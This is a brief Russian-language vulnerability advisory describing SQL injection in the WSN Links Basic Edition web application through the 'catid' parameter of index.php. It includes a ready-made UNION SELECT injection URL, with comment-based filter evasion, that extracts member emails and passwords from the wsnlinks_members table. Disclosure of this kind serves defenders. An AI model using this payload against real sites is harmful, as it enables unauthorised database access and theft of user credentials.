Программа: WSN Links Basic Edition

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «catid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://www.server.com/Script_Dir/index.php?action=displaycat&catid=1/* */and/**/1=2/**/UNION/**/ALL/**/SELECT/* */1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password) ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35/**/FROM/* */wsnlinks_members/**/LIMIT/**/0,1/*



Оставить мнение